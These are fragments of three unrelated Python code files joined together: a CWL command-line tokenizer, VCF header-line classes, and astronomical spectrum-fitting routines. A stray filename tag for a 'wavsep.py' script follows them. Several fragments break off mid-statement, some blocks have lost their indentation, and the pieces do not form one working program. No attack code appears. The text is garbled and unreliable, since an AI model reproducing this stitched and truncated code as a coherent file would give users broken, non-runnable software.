    command = _find_command(kwds)
    cheetah_template = command
    # process raw inputs
    inputs = kwds.pop("input", [])
    inputs = list(map(Input, inputs or []))
    # alternatively process example inputs
    example_inputs = kwds.pop("example_input", [])
    for i, input_file in enumerate(example_inputs or []):
        name = "input%d" % (i + 1)
        inputs.append(Input(input_file, name=name, example=True))
        # Swap the literal example path in the command for the parameter name.
        cheetah_template = _replace_file_in_command(cheetah_template, input_file, name)
    # handle raw outputs (from_work_dir ones) as well as named_outputs
    outputs = kwds.pop("output", [])
    outputs = list(map(Output, outputs or []))
    named_outputs = kwds.pop("named_output", [])
    for named_output in (named_outputs or []):
        outputs.append(Output(name=named_output, example=False))
    # handle example outputs
    example_outputs = kwds.pop("example_output", [])
    for i, output_file in enumerate(example_outputs or []):
        name = "output%d" % (i + 1)
        from_path = output_file
        use_from_path = True
        if output_file in cheetah_template:
            # Actually found the file in the command, assume it can
            # be specified directly and skip from_work_dir.
            use_from_path = False
        output = Output(name=name, from_path=from_path,
                        use_from_path=use_from_path, example=True)
        outputs.append(output)
        cheetah_template = _replace_file_in_command(cheetah_template, output_file, output.name)
    self.inputs = inputs
    self.outputs = outputs
    self.command = command
    self.cheetah_template = cheetah_template
def example_input_names(self):
    """Yield the description of each input created from an example file."""
    return (candidate.input_description for candidate in self.inputs if candidate.example)
def example_output_names(self):
    """Yield the example path of each output created from an example file."""
    return (candidate.example_path for candidate in self.outputs if candidate.example)
def cwl_lex_list(self):
    """Tokenize the example command into CWL command parts.

    Returns a list of ``CwlCommandPart``/``CwlInput``/``CwlOutput``
    objects, pairing recognized ``--flag value`` or ``key=value``
    prefixes with the values they govern.
    """
    if not self.command:
        return []
    command_parts = shlex.split(self.command)
    parse_list = []
    input_count = 0
    output_count = 0
    index = 0
    prefixed_parts = []
    # First pass: group raw tokens into (prefix, value) pairs.
    while index < len(command_parts):
        value = command_parts[index]
        eq_split = value.split("=")
        prefix = None
        if not _looks_like_start_of_prefix(index, command_parts):
            # Plain token with no prefix attached.
            index += 1
        elif len(eq_split) == 2:
            # "key=value" style: prefix keeps the trailing "=" and is not
            # separated from its value.
            prefix = Prefix(eq_split[0] + "=", False)
            value = eq_split[1]
            index += 1
        else:
            # "--flag value" style: the next token is the value.
            prefix = Prefix(value, True)
            value = command_parts[index + 1]
            index += 2
        prefixed_parts.append((prefix, value))
    # Second pass: classify each pair as input, output, option, or literal.
    for position, (prefix, value) in enumerate(prefixed_parts):
        if value in self.example_input_names():
            input_count += 1
            input = CwlInput(
                "input%d" % input_count,
                position,
                prefix,
                value,
            )
            parse_list.append(input)
        elif value in self.example_output_names():
            output_count += 1
            output = CwlOutput(
                "output%d" % output_count,
                position,
                prefix,
                value,
            )
            parse_list.append(output)
        elif prefix:
            # Prefixed but not an example file: treat as a typed parameter
            # named after the flag itself.
            param_id = prefix.prefix.lower().rstrip("=")
            type_ = param_type(value)
            input = CwlInput(
                param_id,
                position,
                prefix,
                value,
                type_=type_,
            )
            parse_list.append(input)
        else:
            # Bare token: part of the base command / fixed arguments.
            part = CwlCommandPart(value, position, prefix)
            parse_list.append(part)
    return parse_list
def cwl_properties(self):
base_command = []
arguments = []
inputs = []
outputs = []
lex_list = self.cwl_lex_list()
index = 0
while index < len(lex_list):
token = lex_list[index]
if isinstance(token, CwlCommandPart):
base_command.append(token.value)
else:
break
index += 1
while index < len(lex_list):
token = | |
more than once: {}, using first" "occurence").format(
line.key, line.mapping["ID"]
),
DuplicateHeaderLineWarning,
)
else:
result[line.key][line.mapping["ID"]] = line
else:
result.setdefault(line.key, [])
result[line.key].append(line)
return result
def copy(self):
"""Return a copy of this header"""
return Header([line.copy() for line in self.lines], self.samples.copy())
def add_filter_line(self, mapping):
"""Add FILTER header line constructed from the given mapping
:param mapping: ``OrderedDict`` with mapping to add. It is
recommended to use ``OrderedDict`` over ``dict`` as this makes
the result reproducible
:return: ``False`` on conflicting line and ``True`` otherwise
"""
return self.add_line(FilterHeaderLine.from_mapping(mapping))
def add_contig_line(self, mapping):
"""Add "contig" header line constructed from the given mapping
:param mapping: ``OrderedDict`` with mapping to add. It is
recommended to use ``OrderedDict`` over ``dict`` as this makes
the result reproducible
:return: ``False`` on conflicting line and ``True`` otherwise
"""
return self.add_line(ContigHeaderLine.from_mapping(mapping))
def add_info_line(self, mapping):
"""Add INFO header line constructed from the given mapping
:param mapping: ``OrderedDict`` with mapping to add. It is
recommended to use ``OrderedDict`` over ``dict`` as this makes
the result reproducible
:return: ``False`` on conflicting line and ``True`` otherwise
"""
return self.add_line(InfoHeaderLine.from_mapping(mapping))
def add_format_line(self, mapping):
"""Add FORMAT header line constructed from the given mapping
:param mapping: ``OrderedDict`` with mapping to add. It is
recommended to use ``OrderedDict`` over ``dict`` as this makes
the result reproducible
:return: ``False`` on conflicting line and ``True`` otherwise
"""
return self.add_line(FormatHeaderLine.from_mapping(mapping))
def format_ids(self):
"""Return list of all format IDs"""
return list(self._indices["FORMAT"].keys())
def filter_ids(self):
"""Return list of all filter IDs"""
return list(self._indices["FILTER"].keys())
def info_ids(self):
"""Return list of all info IDs"""
return list(self._indices["INFO"].keys())
def get_lines(self, key):
"""Return header lines having the given ``key`` as their type"""
if key in self._indices:
return self._indices[key].values()
else:
return []
def has_header_line(self, key, id_):
"""Return whether there is a header line with the given ID of the
type given by ``key``
:param key: The VCF header key/line type.
:param id_: The ID value to compare fore
:return: ``True`` if there is a header line starting with ``##${key}=``
in the VCF file having the mapping entry ``ID`` set to ``id_``.
"""
if key not in self._indices:
return False
else:
return id_ in self._indices[key]
    def add_line(self, header_line):
        """Add header line, updating any necessary support indices
        :return: ``False`` on conflicting line and ``True`` otherwise
        """
        # NOTE: the line is appended to ``self.lines`` unconditionally --
        # even a duplicate that is NOT registered in the index below stays
        # in the serialized header.
        self.lines.append(header_line)
        self._indices.setdefault(header_line.key, OrderedDict())
        # Lines without a structured mapping (plain key=value) have no ID to
        # index under.
        if not hasattr(header_line, "mapping"):
            return False  # no registration required
        if self.has_header_line(header_line.key, header_line.mapping["ID"]):
            warnings.warn(
                (
                    "Detected duplicate header line with type {} and ID {}. "
                    "Ignoring this and subsequent one"
                ).format(header_line.key, header_line.mapping["ID"]),
                DuplicateHeaderLineWarning,
            )
            return False
        else:
            # First line with this (key, ID) pair: register it for lookup.
            self._indices[header_line.key][header_line.mapping["ID"]] = header_line
            return True
    def get_info_field_info(self, key):
        """Return :py:class:`FieldInfo` for the given INFO field

        Falls back to reserved/default field information when no INFO line
        with this ID is present (see ``_get_field_info``).
        """
        return self._get_field_info("INFO", key)
    def get_format_field_info(self, key):
        """Return :py:class:`FieldInfo` for the given FORMAT field

        Falls back to reserved/default field information when no FORMAT line
        with this ID is present (see ``_get_field_info``).
        """
        return self._get_field_info("FORMAT", key)
    def _get_field_info(self, type_, key):
        """Return field info for ``key`` of line type ``type_``.

        Looks up the header index first; otherwise falls back to reserved
        defaults, emitting a ``FieldInfoNotFound`` warning.
        """
        result = self._indices[type_].get(key)
        if result:
            return result
        # NOTE(review): RESERVED_INFO is consulted even when type_ is
        # "FORMAT" -- confirm whether a FORMAT-specific reserved table was
        # intended here.
        if key in RESERVED_INFO:
            res = FieldInfo(RESERVED_INFO[key].type, RESERVED_INFO[key].number)
        else:
            # Unknown field: permissive default of unbounded String values.
            res = FieldInfo("String", HEADER_NUMBER_UNBOUNDED)
        warnings.warn(
            "{} {} not found using {}/{} instead".format(type_, key, res.type, repr(res.number)),
            FieldInfoNotFound,
        )
        return res
def __eq__(self, other):
if isinstance(other, self.__class__):
return (self.lines, self.samples) == (other.lines, other.samples)
return NotImplemented
def __ne__(self, other):
if isinstance(other, self.__class__):
return (self.lines, self.samples) != (other.lines, other.samples)
return NotImplemented
    def __hash__(self):
        # Headers are mutable, so they must never be used as dict keys or
        # set members.
        raise TypeError("Unhashable type: Header")
def __str__(self):
tpl = "Header(lines={}, samples={})"
return tpl.format(*map(repr, (self.lines, self.samples)))
    def __repr__(self):
        """Same as ``__str__``"""
        return str(self)
class HeaderLine:
    """Base class for VCF header lines

    Represents a plain ``##key=value`` pair with no structured mapping.
    """

    def __init__(self, key, value):
        #: ``str`` with key of header line
        self.key = key
        # ``str`` with raw value of header line
        self._value = value

    def copy(self):
        """Return a copy"""
        return self.__class__(self.key, self.value)

    @property
    def value(self):
        """Raw value of the header line."""
        return self._value

    def serialize(self):
        """Return VCF-serialized version of this header line"""
        return "".join(("##", self.key, "=", self.value))

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return NotImplemented
        return self.key == other.key and self.value == other.value

    def __ne__(self, other):
        if not isinstance(other, self.__class__):
            return NotImplemented
        return self.key != other.key or self.value != other.value

    def __hash__(self):
        # Header lines are mutable, so hashing is disabled.
        raise TypeError("Unhashable type: HeaderLine")

    def __str__(self):
        return "HeaderLine({}, {})".format(repr(self.key), repr(self.value))

    def __repr__(self):
        return str(self)
def mapping_to_str(mapping):
    """Convert mapping to a VCF-style string of the form ``<k1=v1,k2=v2,...>``."""
    body = ",".join(
        "{}={}".format(key, serialize_for_header(key, value))
        for key, value in mapping.items()
    )
    return "<{}>".format(body)
class SimpleHeaderLine(HeaderLine):
    """Base class for simple header lines, currently contig and filter
    header lines

    Don't use this class directly but rather the sub classes.

    :raises: :py:class:`vcfpy.exceptions.InvalidHeaderException` in
        the case of missing key ``"ID"``
    """

    def __init__(self, key, value, mapping):
        super().__init__(key, value)
        # The "ID" entry is mandatory for all simple header lines.
        if "ID" not in mapping:
            raise exceptions.InvalidHeaderException(
                'Missing key "ID" in header line "{}={}"'.format(key, value)
            )
        #: ``collections.OrderedDict`` with key/value mapping of the attributes
        self.mapping = OrderedDict(mapping.items())

    def copy(self):
        """Return a copy"""
        copied_mapping = OrderedDict(self.mapping.items())
        return self.__class__(self.key, self.value, copied_mapping)

    @property
    def value(self):
        # The value is always rendered from the mapping, never from _value.
        return mapping_to_str(self.mapping)

    def serialize(self):
        return "".join(map(str, ["##", self.key, "=", self.value]))

    def __str__(self):
        return "SimpleHeaderLine({}, {}, {})".format(
            repr(self.key), repr(self.value), repr(self.mapping)
        )

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return NotImplemented
        return (self.key, self.value, self.mapping) == (other.key, other.value, other.mapping)

    def __ne__(self, other):
        if not isinstance(other, self.__class__):
            return NotImplemented
        return (self.key, self.value, self.mapping) != (other.key, other.value, other.mapping)
class AltAlleleHeaderLine(SimpleHeaderLine):
    """Alternative allele header line

    Mostly used for defining symbolic alleles for structural variants and
    IUPAC ambiguity codes
    """

    @classmethod
    def from_mapping(klass, mapping):
        """Construct from mapping, not requiring the string value"""
        return AltAlleleHeaderLine("ALT", mapping_to_str(mapping), mapping)

    def __init__(self, key, value, mapping):
        super().__init__(key, value, mapping)
        #: name of the alternative allele
        self.id = self.mapping["ID"]

    def __hash__(self):
        # Mutable, therefore unhashable.
        raise TypeError("Unhashable type: AltAlleleHeaderLine")

    def __str__(self):
        return "AltAlleleHeaderLine({}, {}, {})".format(
            repr(self.key), repr(self.value), repr(self.mapping)
        )
class ContigHeaderLine(SimpleHeaderLine):
    """Contig header line

    Most importantly, parses the ``'length'`` key into an integer.
    """

    @classmethod
    def from_mapping(klass, mapping):
        """Construct from mapping, not requiring the string value"""
        return ContigHeaderLine("contig", mapping_to_str(mapping), mapping)

    def __init__(self, key, value, mapping):
        """Initialize from ``key``/``value`` and attribute ``mapping``.

        :raises: ``ValueError`` if ``'length'`` is present but not parseable
            as an integer.
        """
        super().__init__(key, value, mapping)
        # Convert the 'length' entry to an integer.  Bug fix: the conversion
        # must be applied to ``self.mapping`` -- the copy made by
        # ``SimpleHeaderLine.__init__`` -- not to the caller's ``mapping``;
        # previously ``self.length`` stayed a string (contradicting the class
        # docstring) and the caller's dict was mutated as a side effect.
        if "length" in self.mapping:
            self.mapping["length"] = int(self.mapping["length"])
        else:
            warnings.warn(
                'Field "length" not found in header line {}={}'.format(key, value),
                FieldInfoNotFound,
            )
        #: name of the contig
        self.id = self.mapping["ID"]
        #: length of the contig as ``int``, ``None`` if missing
        self.length = self.mapping.get("length")

    def __hash__(self):
        # Mutable, therefore unhashable.
        raise TypeError("Unhashable type: ContigHeaderLine")

    def __str__(self):
        return "ContigHeaderLine({}, {}, {})".format(
            *map(repr, (self.key, self.value, self.mapping))
        )
class FilterHeaderLine(SimpleHeaderLine):
    """FILTER header line
    """

    @classmethod
    def from_mapping(klass, mapping):
        """Construct from mapping, not requiring the string value"""
        return FilterHeaderLine("FILTER", mapping_to_str(mapping), mapping)

    def __init__(self, key, value, mapping):
        super().__init__(key, value, mapping)
        # A FILTER line should carry a human-readable description; warn if absent.
        if "Description" not in self.mapping:
            warnings.warn(
                'Field "Description" not found in header line {}={}'.format(key, value),
                FieldInfoNotFound,
            )
        #: token for the filter
        self.id = self.mapping["ID"]
        #: description for the filter, ``None`` if missing
        self.description = self.mapping.get("Description")

    def __hash__(self):
        # Mutable, therefore unhashable.
        raise TypeError("Unhashable type: FilterHeaderLine")

    def __str__(self):
        return "FilterHeaderLine({}, {}, {})".format(
            repr(self.key), repr(self.value), repr(self.mapping)
        )
class MetaHeaderLine(SimpleHeaderLine):
    """META header line

    Used for defining the set of valid values for SAMPLE keys.
    """

    @classmethod
    def from_mapping(klass, mapping):
        """Construct from mapping, not requiring the string value"""
        return MetaHeaderLine("META", mapping_to_str(mapping), mapping)

    def __init__(self, key, value, mapping):
        super().__init__(key, value, mapping)
        #: ID of the META entry
        self.id = self.mapping["ID"]

    def __hash__(self):
        # Mutable, therefore unhashable.
        raise TypeError("Unhashable type: MetaHeaderLine")

    def __str__(self):
        return "MetaHeaderLine({}, {}, {})".format(*map(repr, (self.key, self.value, self.mapping)))
class PedigreeHeaderLine(SimpleHeaderLine):
    """Header line for defining a pedigree entry
    """

    @classmethod
    def from_mapping(klass, mapping):
        """Construct from mapping, not requiring the string value"""
        return PedigreeHeaderLine("PEDIGREE", mapping_to_str(mapping), mapping)

    def __init__(self, key, value, mapping):
        super().__init__(key, value, mapping)
        #: ID of the pedigree entry
        self.id = self.mapping["ID"]

    def __hash__(self):
        # Mutable, therefore unhashable.
        raise TypeError("Unhashable type: PedigreeHeaderLine")

    def __str__(self):
        return "PedigreeHeaderLine({}, {}, {})".format(
            *map(repr, (self.key, self.value, self.mapping))
        )
class SampleHeaderLine(SimpleHeaderLine):
    """Header line for defining a SAMPLE entry
    """

    @classmethod
    def from_mapping(klass, mapping):
        """Construct from mapping, not requiring the string value"""
        return SampleHeaderLine("SAMPLE", mapping_to_str(mapping), mapping)

    def __init__(self, key, value, mapping):
        super().__init__(key, value, mapping)
        #: ID of the sample entry
        self.id = self.mapping["ID"]

    # NOTE: __eq__/__ne__ below duplicate SimpleHeaderLine's implementations
    # verbatim; they could be inherited instead.
    def __eq__(self, other):
        if isinstance(other, self.__class__):
            return (self.key, self.value, self.mapping) == (other.key, other.value, other.mapping)
        return NotImplemented

    def __ne__(self, other):
        if isinstance(other, self.__class__):
            return (self.key, self.value, self.mapping) != (other.key, other.value, other.mapping)
        return NotImplemented

    def __hash__(self):
        # Mutable, therefore unhashable.
        raise TypeError("Unhashable type: SampleHeaderLine")

    def __str__(self):
        return "SampleHeaderLine({}, {}, {})".format(
            *map(repr, (self.key, self.value, self.mapping))
        )
class CompoundHeaderLine(HeaderLine):
"""Base class for compound header lines, currently format and header lines
Compound header lines describe | |
for o in range(lsf.norder):
wobs = wave[:,o]
dw = np.median(dln.slope(wobs))
wv1,ind1 = dln.closest(synspec.wave,np.min(wobs)-2*np.abs(dw))
wv2,ind2 = dln.closest(synspec.wave,np.max(wobs)+2*np.abs(dw))
modelflux = synspec.flux[ind1:ind2+1]
modelwave = synspec.wave[ind1:ind2+1]
modelcont = synspec.cont[ind1:ind2+1]
# Rebin, if necessary
# get LSF FWHM (A) for a handful of positions across the spectrum
xp = np.arange(npix//20)*20
fwhm = lsf.fwhm(wobs[xp],xtype='Wave',order=o)
# FWHM is in units of lsf.xtype, convert to wavelength/angstroms, if necessary
if lsf.xtype.lower().find('pix')>-1:
fwhm *= np.abs(dw)
# convert FWHM (A) in number of model pixels at those positions
dwmod = dln.slope(modelwave)
dwmod = np.hstack((dwmod,dwmod[-1]))
xpmod = dln.interp(modelwave,np.arange(len(modelwave)),wobs[xp],kind='cubic',assume_sorted=False,extrapolate=True)
xpmod = np.round(xpmod).astype(int)
fwhmpix = np.abs(fwhm/dwmod[xpmod])
# need at least ~4 pixels per LSF FWHM across the spectrum
# using 3 affects the final profile shape
nbin = np.round(np.min(fwhmpix)//4).astype(int)
if np.min(fwhmpix) < 3.7:
warnings.warn('Model has lower resolution than the observed spectrum. Only '+str(np.min(fwhmpix))+' model pixels per resolution element')
if np.min(fwhmpix) < 2.8:
raise Exception('Model has lower resolution than the observed spectrum. Only '+str(np.min(fwhmpix))+' model pixels per resolution element')
if nbin>1:
npix2 = np.round(len(synspec.flux) // nbin).astype(int)
modelflux = dln.rebin(modelflux[0:npix2*nbin],npix2)
modelwave = dln.rebin(modelwave[0:npix2*nbin],npix2)
modelcont = dln.rebin(modelcont[0:npix2*nbin],npix2)
# Convolve
lsf2d = lsf.anyarray(modelwave,xtype='Wave',order=o,original=False)
cflux = utils.convolve_sparse(modelflux,lsf2d)
# Interpolate onto final wavelength array
flux = synple.interp_spl(wobs, modelwave, cflux)
cont = synple.interp_spl(wobs, modelwave, modelcont)
pspec.flux[:,o] = flux
pspec.cont[:,o] = cont
pspec.normalized = True
# Normalize
if norm is True:
newcont = pspec.continuum_func(pspec)
pspec.flux /= newcont
pspec.cont *= newcont
return pspec
def mkbounds(params, paramlims=None):
    """Make lower and upper boundaries for parameters.

    Parameters
    ----------
    params : list of str
        Parameter names (case-insensitive), e.g. 'TEFF', 'LOGG', 'MG_H'.
    paramlims : dict, optional
        Mapping of parameter name -> (lower, upper) overriding the defaults.
        Keys are matched case-insensitively.

    Returns
    -------
    bounds : tuple of two numpy arrays
        (lower bounds, upper bounds), one entry per parameter.
    """
    pnames = np.char.array(params).upper()
    n = len(pnames)
    lbounds = np.zeros(n, np.float64)
    ubounds = np.zeros(n, np.float64)
    # Default limits for the standard stellar parameters; as before, only
    # the FIRST occurrence of each name is set.
    defaults = {
        'TEFF': (3500, 60000),
        'LOGG': (0, 5),
        'FE_H': (-3, 1),
        'VMICRO': (0, 5),
        'VROT': (0, 500),
        'RV': (-1500, 1500),
    }
    for key, (lo, hi) in defaults.items():
        g, = np.where(pnames == key)
        if len(g) > 0:
            lbounds[g[0]] = lo
            ubounds[g[0]] = hi
    # Abundances: any X_H parameter other than FE_H.
    g, = np.where((pnames.find('_H') != -1) & (pnames != 'FE_H'))
    if len(g) > 0:
        lbounds[g] = -3
        ubounds[g] = 10
    # Apply user-supplied limits.  Bug fix: build a case-insensitive map so
    # that lower/mixed-case keys in paramlims no longer raise KeyError
    # (previously the uppercased key was used to index the original dict).
    if paramlims is not None:
        limmap = {key.upper(): value for key, value in paramlims.items()}
        for i, name in enumerate(pnames):
            if name in limmap:
                lbounds[i] = limmap[name][0]
                ubounds[i] = limmap[name][1]
    bounds = (lbounds, ubounds)
    return bounds
def mkdxlim(fitparams):
    """ Make array of parameter changes at which curve_fit should finish."""
    # Convergence step per known parameter name; abundances (X_H) and
    # anything unknown fall through to the defaults below.
    steps = {'TEFF': 1.0, 'LOGG': 0.005, 'VMICRO': 0.1, 'VROT': 0.1, 'RV': 0.01}
    dx_lim = np.zeros(len(fitparams), float)
    for k, name in enumerate(fitparams):
        if name in steps:
            dx_lim[k] = steps[name]
        elif name.endswith('_H'):
            dx_lim[k] = 0.005
        else:
            dx_lim[k] = 0.01
    return dx_lim
def initpars(params, fitparams, bounds=None):
    """ Make initial set of parameters given PARAMS and
        FITPARAMS."""
    # Work with upper-cased keys/names throughout.
    params = {key.upper(): value for key, value in params.items()}
    fitparams = [name.upper() for name in fitparams]
    # Fallback starting values for parameters absent from PARAMS.
    defaults = {'RV': 0.0, 'VMICRO': 2.0, 'VROT': 0.0, 'TEFF': 5000.0, 'LOGG': 3.0}
    npars = len(fitparams)
    pinit = np.zeros(npars, np.float64)
    for k, name in enumerate(fitparams):
        if name in params:
            # This parameter is in PARAMS
            pinit[k] = params[name]
        elif name in defaults:
            pinit[k] = defaults[name]
        elif name.endswith('_H'):
            # Abundances, use FE_H if possible
            pinit[k] = params.get('FE_H', 0.0)
        else:
            pinit[k] = 0.0
    # Make sure initial parameters are within the boundary limits
    if bounds is not None:
        for k in range(npars):
            pinit[k] = dln.limit(pinit[k], bounds[0][k], bounds[1][k])
    return pinit
def specfigure(figfile,spec,fmodel,out,original=None,verbose=True,figsize=10):
    """Make a diagnostic figure comparing an observed spectrum to its model.

    Parameters
    ----------
    figfile : str
        Output figure filename; an existing file is removed first.
    spec : Spec1D object
        Observed (masked) spectrum, single- or multi-order.
    fmodel : Spec1D object
        Best-fitting model spectrum to overplot in red.
    out : structured array
        Fit results; currently only referenced by the commented-out
        annotations below.
    original : Spec1D object, optional
        Unmasked original spectrum, overplotted in green when supplied.
    verbose : bool, optional
        If True (default), print the name of the saved figure.
    figsize : int or float, optional
        Figure width in inches (height is derived from it).  Default 10.
    """
    #import matplotlib
    matplotlib.use('Agg')
    #import matplotlib.pyplot as plt
    if os.path.exists(figfile): os.remove(figfile)
    norder = spec.norder
    # One extra legend column when the original spectrum is shown as well.
    nlegcol = 2
    if original is not None: nlegcol=3
    # Single-order plot
    if norder==1:
        fig,ax = plt.subplots()
        fig.set_figheight(figsize*0.5)
        fig.set_figwidth(figsize)
        if original is not None:
            plt.plot(original.wave,original.flux,color='green',label='Original',linewidth=1)
        plt.plot(spec.wave,spec.flux,'b',label='Masked Data',linewidth=0.5)
        plt.plot(fmodel.wave,fmodel.flux,'r',label='Model',linewidth=0.5,alpha=0.8)
        leg = ax.legend(loc='upper left', frameon=True, framealpha=0.8, ncol=nlegcol)
        plt.xlabel('Wavelength (Angstroms)')
        plt.ylabel('Normalized Flux')
        xr = dln.minmax(spec.wave)
        yr = [np.min([spec.flux,fmodel.flux]), np.max([spec.flux,fmodel.flux])]
        if original is not None:
            yr = [np.min([original.flux,spec.flux,fmodel.flux]), np.max([spec.flux,fmodel.flux])]
        # Pad the y-range (extra room at the bottom for the legend), then
        # clamp to [-0.2, 2.0].
        # NOTE(review): the top pad is 0.005 here vs 0.05 in the multi-order
        # branch below -- confirm whether that asymmetry is intentional.
        yr = [yr[0]-dln.valrange(yr)*0.15,yr[1]+dln.valrange(yr)*0.005]
        yr = [np.max([yr[0],-0.2]), np.min([yr[1],2.0])]
        plt.xlim(xr)
        plt.ylim(yr)
        # snr is only consumed by the commented-out annotation below.
        snr = np.nanmedian(spec.flux/spec.err)
        plt.title(spec.filename)
        #ax.annotate(r'S/N=%5.1f Teff=%5.1f$\pm$%5.1f logg=%5.2f$\pm$%5.2f [Fe/H]=%5.2f$\pm$%5.2f Vrel=%5.2f$\pm$%5.2f chisq=%5.2f' %
        #            (snr, out['TEFF'], out['tefferr'], out['LOGG'], out['loggerr'], out['FE_H'], out['feherr'], out['RV'], out['vrelerr'], out['chisq']),
        #            xy=(np.mean(xr), yr[0]+dln.valrange(yr)*0.05),ha='center')
    # Multi-order plot
    else:
        fig,ax = plt.subplots(norder)
        fig.set_figheight(figsize)
        fig.set_figwidth(figsize)
        for i in range(norder):
            if original is not None:
                ax[i].plot(original.wave[:,i],original.flux[:,i],color='green',label='Original',linewidth=1)
            ax[i].plot(spec.wave[:,i],spec.flux[:,i],'b',label='Masked Data',linewidth=0.5)
            ax[i].plot(fmodel.wave[:,i],fmodel.flux[:,i],'r',label='Model',linewidth=0.5,alpha=0.8)
            if i==0:
                leg = ax[i].legend(loc='upper left', frameon=True, framealpha=0.8, ncol=nlegcol)
            ax[i].set_xlabel('Wavelength (Angstroms)')
            ax[i].set_ylabel('Normalized Flux')
            xr = dln.minmax(spec.wave[:,i])
            yr = [np.min([spec.flux[:,i],fmodel.flux[:,i]]), np.max([spec.flux[:,i],fmodel.flux[:,i]])]
            if original is not None:
                yr = [np.min([original.flux[:,i],spec.flux[:,i],fmodel.flux[:,i]]), np.max([spec.flux[:,i],fmodel.flux[:,i]])]
            yr = [yr[0]-dln.valrange(yr)*0.05,yr[1]+dln.valrange(yr)*0.05]
            # Extra bottom padding on the first panel to fit the legend.
            if i==0:
                yr = [yr[0]-dln.valrange(yr)*0.15,yr[1]+dln.valrange(yr)*0.05]
            yr = [np.max([yr[0],-0.2]), np.min([yr[1],2.0])]
            ax[i].set_xlim(xr)
            ax[i].set_ylim(yr)
            # legend
            if i==0:
                snr = np.nanmedian(spec.flux/spec.err)
                ax[i].set_title(spec.filename)
                #ax[i].annotate(r'S/N=%5.1f Teff=%5.1f$\pm$%5.1f logg=%5.2f$\pm$%5.2f [Fe/H]=%5.2f$\pm$%5.2f Vrel=%5.2f$\pm$%5.2f chisq=%5.2f' %
                #               (snr,out['teff'],out['tefferr'],out['logg'],out['loggerr'],out['feh'],out['feherr'],out['vrel'],out['vrelerr'],out['chisq']),
                #               xy=(np.mean(xr), yr[0]+dln.valrange(yr)*0.05),ha='center')
    plt.savefig(figfile,bbox_inches='tight')
    plt.close(fig)
    if verbose is True: print('Figure saved to '+figfile)
def dopvrot_lsq(spec,models=None,initpar=None,verbose=False,logger=None):
    """
    Least Squares fitting with forward modeling of the spectrum,
    solving simultaneously for [teff, logg, feh, RV, vsini].

    Parameters
    ----------
    spec : Spec1D object
       The observed spectrum to match.
    models : list of Cannon models, optional
       A list of Cannon models to use.  The default is to load all of the Cannon
       models in the data/ directory and use those.
    initpar : numpy array, optional
       Initial estimate for [teff, logg, feh, RV, vsini], optional.
    verbose : bool, optional
       Verbose output of the various steps.  This is False by default.
    logger : logging object, optional
       Logger to use for output; a basic logger is created when omitted.

    Returns
    -------
    out : numpy structured array
       The output structured array of the final derived RVs, stellar parameters and errors.
    bmodel : Spec1D object
       The best-fitting Cannon model spectrum (as Spec1D object).

    Example
    -------
    .. code-block:: python

         out, bmodel = dopvrot_lsq(spec)

    """
    if logger is None:
        logger = dln.basiclogger()
    # Load and prepare the Cannon models
    #-------------------------------------------
    if models is None:
        models = cannon.models.copy()
        models.prepare(spec)
    # Get initial estimates
    if initpar is None:
        initpar = np.array([6000.0, 2.5, -0.5, 0.0, 0.0])
    initpar = np.array(initpar).flatten()
    # Calculate the bounds: teff/logg/feh limited to the union of the model
    # grids; RV to +/-1000 km/s and vsini to [0, 500] km/s.
    lbounds = np.zeros(5,float)+1e5
    ubounds = np.zeros(5,float)-1e5
    for p in models:
        lbounds[0:3] = np.minimum(lbounds[0:3],np.min(p.ranges,axis=1))
        ubounds[0:3] = np.maximum(ubounds[0:3],np.max(p.ranges,axis=1))
    lbounds[3] = -1000
    ubounds[3] = 1000
    lbounds[4] = 0.0
    ubounds[4] = 500.0
    bounds = (lbounds, ubounds)
    # function to use with curve_fit; closes over ``models`` and ``spec``.
    def spec_interp_vsini(x,teff,logg,feh,rv,vsini):
        """ This returns the interpolated model for a given spectrum."""
        # The "models" and "spec" must already exist outside of this function
        m = models(teff=teff,logg=logg,feh=feh,rv=rv)
        if m is None:      # there was a problem
            # Huge residual so curve_fit steers away from invalid parameters.
            return np.zeros(spec.flux.shape,float).flatten()+1e30
        # Broaden to vsini
        if spec.norder>1:
            smflux = spec.flux*0
            for k in range(spec.norder):
                smflux[:,k] = utils.broaden(m.wave[:,k],m.flux[:,k],vsini=vsini)
        else:
            smflux = utils.broaden(m.wave.flatten(),m.flux.flatten(),vsini=vsini)
        return smflux.flatten()
    def spec_interp_vsini_jac(x,*args):
        """ Compute the Jacobian matrix (an m-by-n matrix, where element (i, j)
        is the partial derivative of f[i] with respect to x[j]) by one-sided
        finite differences with a 2% relative step. """
        relstep = 0.02
        npix = len(x)
        npar = len(args)
        # Current values
        f0 = spec_interp_vsini(x,*args)
        # Initialize jacobian matrix
        jac = np.zeros((npix,npar),np.float64)
        # Loop over parameters
        for i in range(npar):
            pars = np.array(copy.deepcopy(args))
            step = relstep*pars[i]
            # Guard against a zero/negative step when the parameter is <= 0.
            if step<=0.0:
                step = 0.02
            pars[i] += step
            f1 = spec_interp_vsini(x,*pars)
            jac[:,i] = (f1-f0)/step
        return jac
    # Use curve_fit
    lspars, lscov = curve_fit(spec_interp_vsini, spec.wave.flatten(), spec.flux.flatten(), sigma=spec.err.flatten(),
                              p0=initpar, bounds=bounds, jac=spec_interp_vsini_jac)
    # If it hits a boundary then the solution won't change much compared to initpar
    # setting absolute_sigma=True gives crazy low lsperror values
    lsperror = np.sqrt(np.diag(lscov))
    if verbose is True:
        logger.info('Least Squares RV and stellar parameters:')
        for k,n in enumerate(['Teff','logg','[Fe/H]','RV','Vsini']):
            logger.info('%s = %f' % (n,lspars[k]))
    # Evaluate the best-fit model and a reduced chi-square-like statistic.
    lsmodel = spec_interp_vsini(spec.wave,teff=lspars[0],logg=lspars[1],feh=lspars[2],rv=lspars[3],vsini=lspars[4])
    lschisq = np.sqrt(np.sum(((spec.flux.flatten()-lsmodel)/spec.err.flatten())**2)/len(lsmodel))
    if verbose is True: logger.info('chisq = %5.2f' % lschisq)
    # Put it into the output structure
    npar = len(lspars)
    dtype = np.dtype([('pars',float,npar),('parerr',float,npar),('parcov',float,(npar,npar)),('chisq',float)])
    out = np.zeros(1,dtype=dtype)
    out['pars'] = lspars
    out['parerr'] = lsperror
    out['parcov'] = lscov
    out['chisq'] = lschisq
    return out, lsmodel
def fit_elem(spec,params,elem,verbose=0,alinefile=None,mlinefile=None,logger=None):
""" Fit an individual element."""
t0 = time.time()
if logger is None:
logger = dln.basiclogger()
# Create fitparams
#fitparams = | |
<filename>python/scripts/wavsep/wavsep.py<gh_stars>1-10
